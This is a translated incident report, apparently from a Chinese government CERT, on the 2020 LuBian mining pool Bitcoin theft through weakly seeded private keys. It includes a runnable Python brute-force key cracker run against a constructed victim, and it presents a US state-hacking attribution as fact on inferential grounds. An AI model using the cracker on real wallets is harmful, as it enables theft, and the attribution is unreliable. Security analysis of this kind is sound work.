Original author: National Computer Virus Emergency Response Center
On December 29, 2020, the LuBian mining pool suffered a major hacking attack in which 127,272.06953176 BTC (worth approximately $3.5 billion at the time, about $15 billion today) were stolen. The holder of this Bitcoin was Chen Zhi, chairman of Cambodia's Prince Group. After the attack, in early 2021 and again in July 2022, Chen Zhi and the Prince Group repeatedly posted messages on the blockchain appealing to the hackers to return the stolen Bitcoin and offering to pay a ransom, but received no response. Strangely, after the theft this huge sum sat almost untouched for four years in Bitcoin wallet addresses controlled by the attackers. This does not match the typical behavior of hackers eager to cash out and pursue profit; it looks more like a precise operation orchestrated by a "nation-state hacking organization." Only in June 2024 were the stolen Bitcoins moved to new wallet addresses, where they remain untouched to this day.
On October 14, 2025, the U.S. Department of Justice announced criminal charges against Chen Zhi and the seizure of 127,000 BTC from him and the Prince Group. The evidence suggests that the Bitcoins seized by the U.S. government are the same coins stolen from the LuBian mining pool by hackers in 2020. In other words, the U.S. government may have already taken Chen Zhi's 127,000 BTC through hacking as early as 2020, a classic state-sponsored "double-cross" carried out by a national hacking organization. This report traces the incident from a technical perspective, analyzes the key technical details with a focus on how the theft was carried out, reconstructs the complete attack timeline, and assesses Bitcoin's security mechanisms, in the hope of providing useful security insights for the cryptocurrency industry and its users.
I. Background of the Event
The LuBian mining pool, founded in early 2020, was a rapidly rising Bitcoin mining pool operating mainly in China and Iran. In December 2020 it suffered a massive hack in which over 90% of its Bitcoin holdings were stolen: 127,272.06953176 BTC in total, closely matching the approximately 127,271 BTC named in the US Department of Justice indictment.
LuBian stored and distributed mining rewards centrally. The Bitcoin in the pool's addresses was not held on regulated centralized exchanges but in non-custodial wallets, meaning the private keys were held only by the operator. Non-custodial storage (of which cold wallets and hardware wallets are the best-known forms) is often regarded as the safest place for crypto assets: unlike an exchange account, which can be frozen by a single order, it is a private vault that only the key holder can open. The corollary, which this incident illustrates, is that such a vault is exactly as safe as the key generation behind it.
In Bitcoin, on-chain addresses identify ownership and track the flow of coins; whoever controls the private key behind an address has complete control over the Bitcoin held there. According to on-chain analysis firms, the massive amount of Bitcoin held by Chen Zhi and now under US government control overlaps heavily with the LuBian hack. On-chain records show that on December 29, 2020 (Beijing time), LuBian's core Bitcoin wallet addresses saw abnormal transfers totaling 127,272.06953176 BTC, almost identical to the 127,271 BTC named in the US Department of Justice indictment. The stolen coins then lay dormant until June 2024. Between June 22 and July 23, 2024 (Beijing time), they were transferred to new on-chain addresses and have not moved since. Arkham Intelligence, a well-known US blockchain tracking platform, labels these final addresses as held by the US government. The indictment does not disclose how the US government obtained the private keys to Chen Zhi's addresses.

Figure 1: Timeline of Key Activities
II. Attack Link Analysis
Random numbers are the cornerstone of cryptographic security in blockchain systems. Bitcoin uses public-key cryptography (ECDSA over the secp256k1 curve); a private key is a 256-bit random number, and guessing it by brute force would take on the order of 2^256 attempts, which is infeasible (even the best known discrete-logarithm attacks on secp256k1 need about 2^128 operations). But if the 256-bit private key is not fully random, for example if 224 of its bits follow a predictable pattern and only 32 bits carry real randomness, its strength collapses: it can be brute-forced in at most 2^32 (about 4.29 billion) attempts. The September 2022 theft of about $160 million from the UK cryptocurrency market maker Wintermute was caused by a weak-randomness flaw of this kind (the Profanity vanity-address tool it had used seeded its key generation with only 32 bits).
In August 2023, the security researchers behind the "Milk Sad" disclosure announced a pseudo-random number generator (PRNG) weakness in a third-party key generation tool, Libbitcoin Explorer, and obtained a CVE for it (CVE-2023-39910). In their subsequent research they noted that the LuBian Bitcoin mining pool's wallets suffered from a similar weakness, and the list of compromised LuBian addresses they published includes all 25 Bitcoin addresses named in the US Department of Justice indictment.

Figure 2: List of 25 Bitcoin wallet addresses in the U.S. Department of Justice indictment
As a non-custodial mining pool, LuBian managed its funds with a custom private key generation routine. Instead of drawing 256 bits from a cryptographically secure source, the routine seeded a non-cryptographic pseudo-random number generator, the Mersenne Twister (MT19937-32), with a single 32-bit value (a timestamp or a similarly weak input) and derived the key from that generator's output. The entire 256-bit key is therefore a deterministic function of 4 bytes of seed, so its effective entropy is 32 bits: an attacker who knows the derivation needs at most 2^32 guesses, and any single guess is correct with probability 1/2^32. At a modest 10^6 keys per second the full seed space takes about 4,295 seconds (roughly 1.2 hours); GPU-accelerated custom tooling shortens this to minutes. Attackers exploited this weakness to drain the LuBian pool's Bitcoin.

Figure 3: Comparison Table of LuBian Mining Pool's Defects Compared with Industry Safety Standards
Through technical tracing, the complete timeline and related details of the LuBian mining pool hack are as follows:
1. Attack and Theft Phase: December 29, 2020 (Beijing Time)
Incident: The hackers exploited the private key generation flaw in LuBian's Bitcoin wallet addresses to brute-force the keys of over 5,000 weakly seeded addresses (wallet type: P2WPKH nested in P2SH, addresses beginning with 3). Within roughly two hours about 127,272.06953176 BTC (worth approximately $3.5 billion at the time) was drained from these addresses, leaving under 200 BTC behind. All the suspicious transactions paid the same fee, indicating that the attack was executed by an automated bulk transfer script.
Sender: LuBian mining pool weak random Bitcoin wallet address group (controlled by the LuBian mining farm operating entity, belonging to Chen Zhi's Prince Group);
Recipient: A group of Bitcoin wallet addresses controlled by the attacker (undisclosed addresses);
Transfer path: Weak wallet address group → Attacker's wallet address group;
Correlation analysis: The total stolen, 127,272.06953176 BTC, matches the approximately 127,271 BTC named in the US Department of Justice indictment.
2. Dormant Phase: December 30, 2020 to June 22, 2024 (Beijing Time)
Event: The Bitcoins stolen in 2020 through the pseudo-random number vulnerability lay dormant in attacker-controlled wallet addresses for as long as four years. Apart from dust-sized transactions amounting to less than one ten-thousandth of the total, which may have been tests, the funds did not move.
Correlation analysis: The coins remained almost untouched until the US government took full control of them on June 22, 2024. This is inconsistent with ordinary hackers, who are eager to cash out and pursue profit; it looks more like a precise operation orchestrated by a state-sponsored hacking organization.
3. Recovery Attempt Phase: Early 2021; July 4 and 26, 2022 (Beijing Time)
Event: During the dormant period, in early 2021, the LuBian mining pool sent over 1,500 messages (costing approximately 1.4 BTC in fees) embedded in the blockchain through Bitcoin's OP_RETURN output type, pleading with the hackers to return the funds. Example message: "Please return our funds, we'll pay a reward." On July 4 and 26, 2022, LuBian again sent OP_RETURN messages, for example: "MSG from LB. To the white hat who is saving our asset, you can contact through 1228BTC@gmail.com to discuss the return of the asset and your reward."
Sender: LuBian's weakly seeded Bitcoin wallet addresses (controlled by the LuBian mining farm operating entity, belonging to Chen Zhi's Prince Group);
Recipient: The group of Bitcoin wallet addresses controlled by the attacker;
Transfer path: weak wallet address group → attacker's wallet address group, as small transactions carrying OP_RETURN outputs;
Correlation analysis: These messages confirm repeated attempts by LuBian, as sender, to contact a "third-party hacker" to request the return of the assets and negotiate a ransom.
4. Activation and Transfer Phase: June 22 to July 23, 2024 (Beijing Time)
Incident: The Bitcoins in the dormant attacker-controlled wallet addresses were activated and moved to a final set of wallet addresses, which Arkham Intelligence, a well-known US blockchain tracking platform, identifies as held by the US government.
Sender: The group of Bitcoin wallet addresses controlled by the attacker;
Recipient: The newly consolidated final wallet address group (not published at the time, but confirmed to be controlled by the US government);
Transfer path: Bitcoin wallet address group controlled by attackers → wallet address group controlled by the US government;
Correlation analysis: This batch of stolen Bitcoins remained largely untouched for four years before finally being taken over by the US government.
5. Notice of Seizure: October 14, 2025 (US local time)
Event: The U.S. Department of Justice issued a statement announcing charges against Chen Zhi and "confiscating" 127,000 bitcoins in his possession.
Because every Bitcoin transaction is publicly recorded, the funds can be traced backward as well as forward. On this basis, this report traced the sources of the Bitcoin held in LuBian's weakly seeded wallet addresses (controlled by the LuBian mining operating entity, possibly belonging to Chen Zhi's Prince Group). Of the 127,272.06953176 BTC stolen, approximately 17,800 BTC came from the pool's own mining, approximately 2,300 BTC from mining pool payouts (wages), and approximately 107,100 BTC from exchanges and other channels. These preliminary results are at odds with the indictment's claim that all of the Bitcoin originated from illicit income.
III. Detailed Analysis of Vulnerability Technologies
1. Generating a Bitcoin wallet address private key:
The core vulnerability in the LuBian mining pool lies in its private key generator, which has the same kind of flaw as the "Milk Sad" defect in Libbitcoin Explorer (bx). The generator uses the Mersenne Twister (MT19937-32), a non-cryptographic PRNG, initialized with a single 32-bit seed, so the resulting key has an effective entropy of only 32 bits regardless of its 256-bit length. MT19937 output is predictable and its internal state can be reconstructed from its output; here the attacker does not even need that, since enumerating every possible 32-bit seed (0 to 2^32-1), deriving the corresponding private and public key, and comparing against the public key hash of each known wallet address is enough.
In this report's simplified model the derivation is: random seed → SHA-256 → ECDSA private key (a 32-byte scalar on secp256k1). Standard wallets instead derive keys from a BIP-39 mnemonic through BIP-32, but no derivation step can add entropy that the seed did not have: a weak seed yields a weak key whatever follows it.
LuBian's underlying library may have been custom code or an open-source library such as Libbitcoin, but either way it neglected entropy. In the Milk Sad case, Libbitcoin Explorer's "bx seed" command used MT19937-32 seeded from the system clock truncated to 32 bits, so every key it produced could be brute-forced. In the LuBian attack over 5,000 wallets were affected, indicating a systemic weakness, most likely the same flawed routine reused during bulk wallet generation.
2. Simulated attack process:
(1) Identify the target wallet addresses (by monitoring LuBian mining pool activity on-chain);
(2) Enumerate all 32-bit seeds: for seed in 0 to 4294967295;
(3) Derive the candidate private key from the seed: run the weak PRNG from that seed and hash its output, private_key = SHA256(PRNG(seed)). The exact derivation LuBian used is not published; what matters is that the key is a fixed function of the 32-bit seed;
(4) Derive the public key and address from the private key using ECDSA on the secp256k1 curve;
(5) Match: if the derived address equals a target address, sign a transaction with the recovered private key and move the funds.
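The brute-force search described in steps (1) to (5) above, written out as runnable Python. This is an added example, not LuBian's code and not the Milk Sad team's tooling. The derivation it uses (32-bit seed → MT19937-32 → 32 bytes of generator output → SHA-256 → secp256k1 scalar) is an assumption standing in for LuBian's unpublished routine; the victim's seed is constructed, and the search is confined to a small window around it so the script finishes in seconds, whereas the real attack is the same loop over all 2^32 seeds. Matching is done on the compressed public key, which is visible on-chain once an address has spent (as a pool paying out rewards does); for a never-spent address the comparison is made against HASH160 (RIPEMD-160 of SHA-256) of the candidate public key instead, which changes only the final comparison.

```python
"""Brute-forcing a Bitcoin private key derived from a 32-bit MT19937 seed.
Assumed derivation (stands in for LuBian's unpublished routine):
    32-bit seed -> MT19937-32 -> 32 bytes of output -> SHA-256 -> secp256k1 scalar
Pure Python, offline. A real attacker runs the same loop over all 2**32 seeds on GPUs."""
import hashlib
import secrets

class MT19937:
    """Mersenne Twister MT19937-32, the generator behind C++ std::mt19937."""
    N, M = 624, 397

    def __init__(self, seed):
        # init_genrand(): the entire 624-word state is a function of one 32-bit seed
        self.mt = [seed & 0xFFFFFFFF]
        for i in range(1, self.N):
            prev = self.mt[i - 1]
            self.mt.append((1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF)
        self.idx = self.N

    def next_u32(self):
        if self.idx >= self.N:  # regenerate the state block
            mt = self.mt
            for i in range(self.N):
                y = (mt[i] & 0x80000000) | (mt[(i + 1) % self.N] & 0x7FFFFFFF)
                mt[i] = mt[(i + self.M) % self.N] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
            self.idx = 0
        y = self.mt[self.idx]
        self.idx += 1
        y ^= y >> 11  # tempering
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF

# secp256k1 in textbook affine coordinates: fine for a demo, far too slow and
# side-channel-unsafe for production use.
P = 2**256 - 2**32 - 977
N_ORDER = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141
G = (0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798,
     0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8)

def ec_add(a, b):
    """Point addition; None is the point at infinity."""
    if a is None:
        return b
    if b is None:
        return a
    (x1, y1), (x2, y2) = a, b
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if a == b:
        lam = 3 * x1 * x1 * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def pubkey_compressed(priv):
    """Double-and-add priv*G, returned as a 33-byte SEC1 compressed public key."""
    result, addend, k = None, G, priv
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    x, y = result
    return bytes([2 + (y & 1)]) + x.to_bytes(32, "big")

def weak_privkey(seed):
    """The flaw: all 256 key bits are a fixed function of 32 seed bits."""
    rng = MT19937(seed)
    raw = b"".join(rng.next_u32().to_bytes(4, "big") for _ in range(8))
    return int.from_bytes(hashlib.sha256(raw).digest(), "big") % N_ORDER or 1

def strong_privkey():
    """The fix: 256 bits from the OS CSPRNG leave nothing for an attacker to enumerate."""
    return secrets.randbelow(N_ORDER - 1) + 1

def crack(target_pubkey, seed_range):
    """Return (seed, privkey) whose derived public key equals the target, else None."""
    for seed in seed_range:
        priv = weak_privkey(seed)
        if pubkey_compressed(priv) == target_pubkey:
            return seed, priv
    return None

if __name__ == "__main__":
    # Constructed victim: key derived from seed 1609200000 (the Unix timestamp for
    # 2020-12-29 00:00 UTC, the kind of weak seed the report describes). Its
    # compressed public key is visible on-chain once the address has spent.
    victim_seed = 1609200000
    victim_pub = pubkey_compressed(weak_privkey(victim_seed))
    # Search a small window around the suspected creation time; the real attack is
    # this same loop over range(0, 2**32).
    print("recovered:", crack(victim_pub, range(victim_seed - 100, victim_seed + 100)))
```

Replacing the window with `range(0, 2**32)` and moving the loop onto GPUs reproduces the attacker's workload; the defender's side of the same picture is `strong_privkey`, which draws all 256 bits from the operating system's CSPRNG.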
Comparison with similar vulnerabilities: the flaw resembles the 32-bit entropy bug in the Trust Wallet browser extension, which allowed attackers to recover wallet private keys, and the "Milk Sad" vulnerability in Libbitcoin Explorer, which likewise exposed private keys through low entropy. In every case the root cause is weak entropy feeding the key derivation; a BIP-39 mnemonic (12 to 24 words encoding 128 to 256 bits) is only as strong as the randomness used to generate it. LuBian may have used a custom algorithm to simplify management of thousands of addresses, at the cost of security.
Defense deficiencies: LuBian did not use multisignature (multisig) spending conditions, hardware wallets, or hierarchical deterministic (HD) wallets. Multisig and hardware key storage would each have raised the bar for an attacker; HD derivation helps only if the master seed itself comes from a cryptographically secure source, since every child key inherits the weakness of the seed. On-chain data shows the attack covered thousands of wallets, confirming a systemic vulnerability rather than a single point of failure.
3. On-chain evidence and recovery attempts:
OP_RETURN messages: LuBian sent over 1,500 messages through Bitcoin's OP_RETURN output type, at a total cost of about 1.4 BTC in fees, pleading with the attackers to return the funds. Each message was an output of a transaction spent from a LuBian-controlled address, so the signatures on those transactions prove the messages came from the holder of the original keys and were not forged. Example messages include "Please return funds" and similar requests, spread over many transactions.
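A builder and decoder for the OP_RETURN outputs described in phase 3 of the timeline and in this section, added here as an example; it is not LuBian's tooling or code from the original report. The transaction outputs it processes are constructed (the P2SH script carries a placeholder hash, and the OP_RETURN carries one of the messages quoted in this report). It shows how a message is embedded in an unspendable output and how an on-chain monitor pulls it back out, including the three push encodings Bitcoin Script allows and rejection of truncated scripts.

```python
"""Build and decode Bitcoin OP_RETURN outputs, the mechanism LuBian used to
message the thief on-chain. Pure Python, no network access."""

OP_RETURN, OP_PUSHDATA1, OP_PUSHDATA2 = 0x6A, 0x4C, 0x4D

def build_op_return(data: bytes) -> bytes:
    """scriptPubKey for an unspendable output carrying `data`.
    Bitcoin Script pushes up to 75 bytes with a one-byte length, up to 255 with
    OP_PUSHDATA1 and up to 65535 with OP_PUSHDATA2. Note that Bitcoin Core's
    long-standing default relay policy accepted at most 80 bytes of OP_RETURN
    payload per output, which LuBian's short messages fit within."""
    n = len(data)
    if n <= 75:
        push = bytes([n])
    elif n <= 0xFF:
        push = bytes([OP_PUSHDATA1, n])
    elif n <= 0xFFFF:
        push = bytes([OP_PUSHDATA2]) + n.to_bytes(2, "little")
    else:
        raise ValueError("payload too large for a single push")
    return bytes([OP_RETURN]) + push + data

def extract_op_return(script: bytes):
    """Return the embedded payload if `script` is an OP_RETURN output, else None.
    Handles the three push encodings and rejects truncated or padded scripts."""
    if not script or script[0] != OP_RETURN:
        return None
    if len(script) == 1:
        return b""  # bare OP_RETURN with no payload
    op, body = script[1], script[2:]
    if 1 <= op <= 75:
        n = op
    elif op == OP_PUSHDATA1 and len(body) >= 1:
        n, body = body[0], body[1:]
    elif op == OP_PUSHDATA2 and len(body) >= 2:
        n, body = int.from_bytes(body[:2], "little"), body[2:]
    else:
        return None  # not a data push this decoder understands
    if len(body) != n:
        return None  # truncated script or trailing garbage
    return body

def scan_outputs(script_pubkeys):
    """Yield (output index, decoded text) for every OP_RETURN among a transaction's
    outputs; this is the check a monitor runs to pick up messages like LuBian's."""
    for i, spk in enumerate(script_pubkeys):
        payload = extract_op_return(spk)
        if payload is not None:
            yield i, payload.decode("utf-8", errors="replace")

# Constructed outputs (not real LuBian transactions): a dust-sized payment to a
# P2SH (prefix-3) address with a placeholder script hash, plus an OP_RETURN carrying
# one of the recovery messages quoted in the report.
SAMPLE_OUTPUTS = [
    bytes.fromhex("a914" + "11" * 20 + "87"),
    build_op_return(b"Please return our funds, we'll pay a reward."),
]

if __name__ == "__main__":
    for idx, text in scan_outputs(SAMPLE_OUTPUTS):
        print(f"output {idx}: {text}")
```

Fed the outputs of the 1,500 recovery transactions, `scan_outputs` would recover every plea in order; the same decoder, pointed at the attacker-controlled addresses, is how one confirms that no reply was ever written back on-chain.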
4. Attack Correlation Analysis:
The U.S. Department of Justice, in its criminal indictment against Chen Zhi dated October 14, 2025 (case number 1:25-cr-00416), listed 25 Bitcoin wallet addresses holding approximately 127,271 BTC, worth approximately $15 billion, which have been seized. Through blockchain analysis and review of official documents, these addresses are highly correlated with the LuBian mining pool attack.
Direct Connection: Blockchain analysis reveals that 25 addresses listed in the U.S. Department of Justice indictment are the final holding addresses of the Bitcoin stolen during the 2020 LuBian mining pool attack. An Elliptic report indicates that this Bitcoin was "stolen" from LuBian's mining operations in 2020. Arkham Intelligence confirms that the funds seized by the U.S. Department of Justice are directly related to the LuBian mining pool theft.
Evidence in the indictment: Although the indictment does not name the "LuBian hack," it states that the funds originated from "theft attacks on Bitcoin mining operations in Iran and China," consistent with the on-chain analysis by Elliptic and Arkham Intelligence.
Relation to the attack: Judging from the attack method, LuBian's huge Bitcoin holdings were stolen in a technical attack in 2020 and lay dormant for four years, during which less than one ten-thousandth of the total moved, until the US government took full control of them in 2024. This is inconsistent with hackers eager to cash out and pursue profit; it looks more like a precise operation orchestrated by a state-sponsored hacking organization. Analysts believe the US government may have taken control of this Bitcoin as early as December 2020.
IV. Impacts and Recommendations
The 2020 hack had far-reaching consequences for the LuBian mining pool: it lost more than 90% of its assets at the time and effectively dissolved. The stolen Bitcoin is now worth about $15 billion, showing how price appreciation amplifies the cost of a breach.
The incident exposed systemic risk in random number generation within cryptocurrency toolchains. To prevent similar vulnerabilities, the industry should generate keys only from cryptographically secure pseudo-random number generators (CSPRNGs), such as the operating system's randomness source; layer defenses with multisignature (multisig) spending conditions, cold storage and regular audits; and avoid custom private key generation algorithms. Mining pools should run real-time on-chain monitoring with alerts on abnormal transfers, which would have flagged the draining of 5,000 addresses within two hours. Ordinary users should avoid unaudited key generation modules, however widely shared. The incident is a reminder that blockchain transparency does not compensate for a weak security foundation, and it underlines the importance of cybersecurity for the future development of the digital economy and digital currencies.
- Core view: the United States stole a huge quantity of Bitcoin through a state-level hacking operation.
- Key elements:
  - A mining pool pseudo-random number vulnerability was exploited to steal 127,000 Bitcoins.
  - The stolen Bitcoins lay dormant for four years, then moved to addresses controlled by the US government.
  - In 2025 the US Department of Justice announced the seizure of these Bitcoins.
- Market impact: exposes systemic security risks in cryptocurrency.
- Timeliness: long-term impact